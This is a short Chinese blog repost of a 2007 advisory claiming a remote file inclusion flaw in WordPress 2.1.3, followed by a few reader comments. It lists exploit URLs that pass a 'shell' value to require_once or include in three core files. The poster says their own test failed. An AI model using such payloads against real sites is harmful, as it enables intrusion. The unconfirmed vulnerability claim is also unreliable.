WordPress v2.1.3 >> remote file include

鬼仔注:前两天看到的,一直考虑要不要放上来,因为我测试没有成功,只是爆出了物理路径(文章末尾附图)。有测试成功的说明下。

来源:SecurityFocus

by : www.hackeraz.ir userz , saeid…
++++++++++++++++++++++++++++++++++++
####################################################
#WordPress >> 2.1.3 Remote File Inclusion #
####################################################
Affected Software .: WordPress >> 2.1.3 #
Download..: http://wordpress-deutschland.org #
Risk …………..: high #
Date ………: 25/4/2007 #
Found by ……….: s433d_only_linux #
Contact ………..: s433d_only_linux (at) yahoo (dot) de [email concealed] #
Web ………….: Www.hackerz.ir #
special thanx ……….. Ali Jasbi my beste friend#
###############################################
Affected File: #
wordpress/wp-settings.php #
wordpress/wp-includes/template-loader.php #
wordpress/wp-includes/theme.php #
###############################################
Exploit:
wordpress/wp-settings.php?require_once=shell?
wordpress/wp-includes/template-loader.php?include=shell?
wordpress/wp-includes/theme.php?require_once=shell?
###############################################

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • 炎藤

    鬼仔会德文--?

  • 茄子宝

    :mad: PHP.INI

    allow_url_include OFF了? :???:

  • 鬼仔

    @炎藤 不会德文啊
    @茄子宝 不清楚,我随手找了个测试了下

  • 形空

    你好,你用的wordpress模板很漂亮~ 请问哪里可以下载?

发表评论